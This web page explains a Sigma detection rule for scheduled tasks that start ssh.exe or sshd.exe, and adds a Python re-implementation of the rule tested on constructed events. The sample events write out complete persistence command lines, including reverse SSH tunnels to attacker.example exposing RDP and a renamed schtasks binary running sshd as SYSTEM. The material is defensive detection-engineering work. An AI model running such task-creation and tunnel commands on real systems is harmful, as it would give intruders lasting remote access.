Potential SSH Tunnel Persistence Install Using A Scheduled Task

Detects the creation of new scheduled tasks from the command line using Schtasks.exe. This rule specifically detects task creations that call OpenSSH (ssh.exe or sshd.exe), which may indicate the creation of a reverse SSH tunnel to the attacker's server.

Sigma rule

```yaml
title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
id: 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f
status: experimental
description: Detects the creation of new scheduled tasks from the command line using Schtasks.exe. This rule specifically detects task creations that call OpenSSH, which may indicate the creation of a reverse SSH tunnel to the attacker's server.
references:
    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
    - https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection
author: Rory Duncan
date: 2025-07-14
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.t1053.005
    - attack.command-and-control
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        - Image|endswith: '\schtasks.exe'
        - OriginalFileName: 'schtasks.exe'
    selection_cli_sshd:
        CommandLine|contains|all:
            - ' /create '
            - 'sshd.exe'
            - '-f'
    selection_cli_ssh:
        CommandLine|contains|all:
            - ' /create '
            - 'ssh.exe'
            - '-i'
    condition: selection_img and 1 of selection_cli_*
falsepositives:
    - Unknown
level: high
```
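To show how the detection block above evaluates against real telemetry, here is an added example (not part of the rule or the SigmaHQ repository) that re-implements the rule's three selections and its condition in plain Python and runs them over a handful of constructed process_creation events. The helper names (`contains_all`, `selection_img`, `matches`, `matching_ids`) are hypothetical; the field names follow the Sysmon/Sigma process_creation schema, and Sigma's default string matching is case-insensitive, so the helpers lower-case both sides. The sample command lines, paths and host names are constructed for the demonstration.

```python
"""Plain-Python re-implementation of the rule's detection block, run over
constructed process_creation events. Helper names are hypothetical."""


def contains_all(value: str, needles) -> bool:
    """Sigma 'contains|all': every needle must be a substring of the field.
    Sigma matches strings case-insensitively by default, so lower-case both sides."""
    value = value.lower()
    return all(n.lower() in value for n in needles)


def selection_img(event: dict) -> bool:
    """selection_img: the image path ends in \\schtasks.exe OR the PE's
    OriginalFileName is schtasks.exe (which survives renaming the binary)."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    return image.endswith("\\schtasks.exe") or original == "schtasks.exe"


def selection_cli_sshd(event: dict) -> bool:
    """selection_cli_sshd: task creation that launches sshd.exe with -f (config file)."""
    return contains_all(event.get("CommandLine", ""), [" /create ", "sshd.exe", "-f"])


def selection_cli_ssh(event: dict) -> bool:
    """selection_cli_ssh: task creation that launches ssh.exe with -i (identity file)."""
    return contains_all(event.get("CommandLine", ""), [" /create ", "ssh.exe", "-i"])


def matches(event: dict) -> bool:
    """condition: selection_img and 1 of selection_cli_*"""
    return selection_img(event) and (selection_cli_sshd(event) or selection_cli_ssh(event))


def matching_ids(events) -> list:
    """Return the ids of the events the rule would alert on, in input order."""
    return [e["id"] for e in events if matches(e)]


SCHTASKS = "C:\\Windows\\System32\\schtasks.exe"

# Constructed sample events, not real telemetry; hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {   # ssh.exe with a key file, scheduled every 5 minutes: hits selection_cli_ssh
        "id": "ssh-key-task",
        "Image": SCHTASKS, "OriginalFileName": "schtasks.exe",
        "CommandLine": 'schtasks.exe /create /tn "WindowsUpdateCheck" '
                       '/tr "C:\\ProgramData\\ssh.exe -i C:\\ProgramData\\id_rsa -N '
                       '-R 2222:127.0.0.1:3389 tunnel@attacker.example" /sc minute /mo 5',
    },
    {   # schtasks.exe copied under another name: only OriginalFileName still identifies it
        "id": "renamed-sshd-task",
        "Image": "C:\\Users\\Public\\st.exe", "OriginalFileName": "schtasks.exe",
        "CommandLine": 'st.exe /create /tn "OpenSSH" /tr "C:\\ProgramData\\sshd.exe '
                       '-f C:\\ProgramData\\sshd_config" /sc onstart /ru SYSTEM',
    },
    {   # an administrator's legitimate ssh.exe -i job: the rule fires here too,
        # which is why falsepositives is 'Unknown' and triage must read the /tr value
        "id": "admin-ssh-sync",
        "Image": SCHTASKS, "OriginalFileName": "schtasks.exe",
        "CommandLine": 'schtasks.exe /create /tn "GitSync" /tr "C:\\Program Files\\OpenSSH\\ssh.exe '
                       '-i C:\\keys\\deploy_key git@git.internal.example" /sc hourly',
    },
    {   # "--full" contains "-f", but there is no sshd.exe on the line, so no match
        "id": "nightly-backup",
        "Image": SCHTASKS, "OriginalFileName": "schtasks.exe",
        "CommandLine": 'schtasks.exe /create /tn "NightlyBackup" /tr "C:\\Tools\\backup.exe --full" /sc daily',
    },
    {   # ssh.exe -i started through cmd.exe: not a schtasks image, selection_img fails
        "id": "cmd-ssh",
        "Image": "C:\\Windows\\System32\\cmd.exe", "OriginalFileName": "Cmd.Exe",
        "CommandLine": 'cmd.exe /c ssh.exe -i C:\\keys\\k -N -R 2222:127.0.0.1:3389 u@attacker.example',
    },
    {   # querying an existing task is not creating one
        "id": "query-only",
        "Image": SCHTASKS, "OriginalFileName": "schtasks.exe",
        "CommandLine": 'schtasks.exe /query /tn "OpenSSH" /v',
    },
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e['id']:<20} {'ALERT' if matches(e) else '-'}")
```

Two things the run makes visible that the YAML alone does not: the `OriginalFileName` alternative is what keeps the rule working when schtasks.exe is copied to another name, and the `-i` / `-f` substrings are matched anywhere in the command line, so a legitimately scheduled `ssh.exe -i` job alerts as well. When tuning, look at the `/tr` payload for `-R`/`-L` forwards and an external destination rather than loosening the selections.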
